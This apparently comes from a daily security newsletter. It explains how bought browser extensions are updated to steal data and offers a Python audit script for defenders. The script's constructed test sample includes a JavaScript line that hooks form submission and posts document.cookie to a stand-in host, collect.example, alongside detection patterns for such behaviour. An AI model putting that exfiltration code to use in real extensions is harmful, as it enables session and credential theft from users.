In yesterday's brief we tracked quishing — phishing via QR codes. Today we move from external attacks to the trojan horse already on your laptop: the browser extension you installed three years ago and forgot about.
The Pattern: Buy, Update, Exfiltrate
An adversary identifies a moderately popular extension: the kind with 50K-500K users, a single developer, and clean reviews. They make an unsolicited offer to buy it. Sometimes they pose as a marketing firm, sometimes as a startup pivoting into the extension's niche. The original developer, often a hobbyist who never monetized it, sells. Within weeks, an "update" rolls out. Now the same extension exfiltrates session cookies, intercepts form submissions, and reports browsing history to a remote server.
This isn't speculative. In the past 24 months, security researchers have documented at least 38 such transitions, affecting an estimated 7 million browsers. The pattern works because the Chrome Web Store and Firefox Add-ons both allow ownership transfer with minimal review, and updates roll out automatically to every installed copy.
Why It's Worse Than Traditional Malware
Three reasons:
- The extension already has consent. When you installed it, you granted whatever host permissions it asked for, often "read and change all your data on all websites". That grant is tied to the extension ID, not to the developer, so it survives a change of owner.
- Updates bypass user awareness. Unlike installing new software, an extension update is invisible: the icon doesn't change, and the store listing may not change either. Chrome and Firefox do disable an extension and prompt you when an update requests permissions it did not have before, which is exactly why buyers target extensions that already hold broad permissions. No new permission, no prompt.
- Detection is delayed. Antivirus software typically scans downloaded files, not the JavaScript the browser itself fetches, unpacks and runs as an extension update. By the time researchers notice, weeks have passed.
The 5-Minute Audit
Open your browser's extension manager today and run this check on every extension you have installed:
- When did it last update? If updates stopped 8+ months ago, the developer may have abandoned it, which makes it a candidate for purchase. Conversely, a long-dormant extension that suddenly shipped an update deserves a closer look.
- Who is the developer now? Click into the store listing. If the developer name or the linked website has changed since you installed it, treat it as suspicious.
- What permissions does it have? "Read and change all your data on all websites" is the highest risk tier. Ask whether you still need this extension at all.
- Did recent updates add permissions? An extension that started as a spell checker and now wants access to all tabs or all sites has scope-creeped: uninstall it.
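The audit above can be scripted for the part that lives on disk. The following is an added example written for this brief, not a tool from any vendor or from the Chrome Web Store: it walks a Chrome/Chromium profile's Extensions directory (assumed layout `<profile>/Extensions/<id>/<version>_<n>/manifest.json`), ranks each extension by the combination of broad host access and sensitive APIs, diffs two manifests for added permissions, and greps the bundled JavaScript for a few constructed indicators. The permission tiers, indicator regexes, sample manifests and sample scripts are all assumptions constructed for the demo; tune them to your environment. The developer-name check (step 2) has no on-disk source and must still be done in the store listing.

```python
"""Offline audit of the extensions unpacked in a Chrome/Chromium profile (added example).
Assumes the layout <profile>/Extensions/<id>/<version>_<n>/manifest.json, e.g.
~/.config/google-chrome/Default/Extensions on Linux. Tiers and indicators are assumptions."""
import json, re, tempfile
from datetime import datetime
from pathlib import Path
# Host patterns that amount to "read and change all your data on all websites".
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
# APIs that make cookie theft or traffic interception possible (assumed tier).
SENSITIVE_APIS = {"cookies", "webRequest", "webRequestBlocking", "tabs", "history", "scripting"}
# Heuristic indicators in bundled JavaScript (constructed; expect false positives).
INDICATORS = {
    "reads document.cookie": re.compile(r"document\.cookie"),
    "hooks form submission": re.compile(r"addEventListener\(\s*['\"]submit['\"]"),
    "posts to hard-coded remote URL": re.compile(r"(?:fetch|sendBeacon)\s*\(\s*['\"]https?://"),
}

def manifest_permissions(manifest: dict) -> tuple[set[str], set[str]]:
    """Split an MV2 or MV3 manifest into (API permissions, host permissions)."""
    perms = set(manifest.get("permissions", []))
    hosts = set(manifest.get("host_permissions", []))
    for p in list(perms):              # MV2 lists host patterns inside "permissions"
        if p == "<all_urls>" or "://" in p:
            perms.discard(p)
            hosts.add(p)
    for cs in manifest.get("content_scripts", []):  # injected everywhere == host access
        hosts.update(cs.get("matches", []))
    return perms, hosts

def risk_level(perms: set[str], hosts: set[str]) -> str:
    """All sites plus a sensitive API is the combination buy-update-exfiltrate needs."""
    if hosts & BROAD_HOSTS and perms & SENSITIVE_APIS:
        return "critical"
    if hosts & BROAD_HOSTS:
        return "high"
    return "medium" if perms & SENSITIVE_APIS else "low"

def new_permissions(old_manifest: dict, new_manifest: dict) -> set[str]:
    """Permissions the newer manifest holds that the older one did not (scope creep)."""
    old_p, old_h = manifest_permissions(old_manifest)
    new_p, new_h = manifest_permissions(new_manifest)
    return (new_p | new_h) - (old_p | old_h)

def scan_scripts(ext_dir: Path) -> dict[str, list[str]]:
    """Map each indicator to the bundled JavaScript files that match it."""
    hits: dict[str, list[str]] = {}
    for js in sorted(ext_dir.rglob("*.js")):
        text = js.read_text(errors="ignore")
        for label, pattern in INDICATORS.items():
            if pattern.search(text):
                hits.setdefault(label, []).append(js.name)
    return hits

def audit_profile(extensions_root: Path) -> list[dict]:
    """One report entry per unpacked extension version under the profile."""
    report = []
    for manifest_path in sorted(extensions_root.glob("*/*/manifest.json")):
        version_dir = manifest_path.parent
        manifest = json.loads(manifest_path.read_text(errors="ignore"))
        perms, hosts = manifest_permissions(manifest)
        report.append({
            "id": version_dir.parent.name,
            "name": manifest.get("name", "?"),
            "version": manifest.get("version", version_dir.name),
            # mtime of the manifest approximates when this version was installed
            "unpacked_at": datetime.fromtimestamp(manifest_path.stat().st_mtime).isoformat(" ", "minutes"),
            "risk": risk_level(perms, hosts),
            "broad_hosts": sorted(hosts & BROAD_HOSTS),
            "sensitive_apis": sorted(perms & SENSITIVE_APIS),
            "indicators": scan_scripts(version_dir),
        })
    return report

# Constructed sample: a spell checker before and after a hostile update, plus a benign theme.
SPELLCHECK_ID, DARKMODE_ID = "a" * 31 + "b", "a" * 31 + "c"   # real ids are 32 letters a-p
SPELLCHECK_V1 = {"manifest_version": 3, "name": "QuickSpell", "version": "1.4.0",
                 "permissions": ["activeTab", "storage"],
                 "content_scripts": [{"matches": ["https://docs.example/*"], "js": ["spell.js"]}]}
SPELLCHECK_V2 = {"manifest_version": 3, "name": "QuickSpell", "version": "2.0.1",
                 "permissions": ["activeTab", "storage", "cookies", "webRequest", "tabs"],
                 "host_permissions": ["<all_urls>"],
                 "content_scripts": [{"matches": ["<all_urls>"], "js": ["spell.js"]}]}
DARKMODE = {"manifest_version": 3, "name": "NightShade", "version": "0.9.2",
            "permissions": ["storage", "activeTab"],
            "content_scripts": [{"matches": ["https://*/*"], "js": ["dark.js"]}]}
SPELL_JS = ("document.addEventListener('submit', () => {\n"
            "  fetch('https://collect.example/s', {method: 'POST', body: document.cookie});\n});\n")
DARK_JS = "document.documentElement.style.filter = 'invert(1)';\n"

def build_sample_profile(root: Path) -> Path:
    """Write the constructed sample to disk; returns the Extensions directory."""
    ext_root = root / "Extensions"
    for ext_id, manifest, script_name, script in ((SPELLCHECK_ID, SPELLCHECK_V2, "spell.js", SPELL_JS),
                                                  (DARKMODE_ID, DARKMODE, "dark.js", DARK_JS)):
        d = ext_root / ext_id / f"{manifest['version']}_0"
        d.mkdir(parents=True, exist_ok=True)
        (d / "manifest.json").write_text(json.dumps(manifest))
        (d / script_name).write_text(script)
    return ext_root

def demo() -> list[dict]:
    """Audit the constructed sample in a temporary directory."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit_profile(build_sample_profile(Path(tmp)))
if __name__ == "__main__":
    for e in demo():
        print(e["risk"], e["name"], e["version"], e["broad_hosts"], e["sensitive_apis"], sorted(e["indicators"]))
```

Point `audit_profile` at your real Extensions directory to get the same report for every installed extension; the benign theme lands at "high" purely on host scope, which is the page's point about asking whether you still need an extension at all. Chrome normally deletes the previous version directory on update, so `new_permissions` is most useful against a manifest you saved earlier or pulled from a backup.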
The Case We're Watching
This week, three productivity extensions with combined ~2M installs were flagged simultaneously by Sucuri and PhishTank. Common pattern: same buyer LLC, same exfiltration endpoint, same 3-week update cadence after acquisition. We've requested comment from the Chrome Web Store and will update our threat archive with the full list.
Tomorrow
We move from supply-chain to identity — how AI-generated voice clones are now bypassing call-center voice authentication, and what banks are quietly doing about it.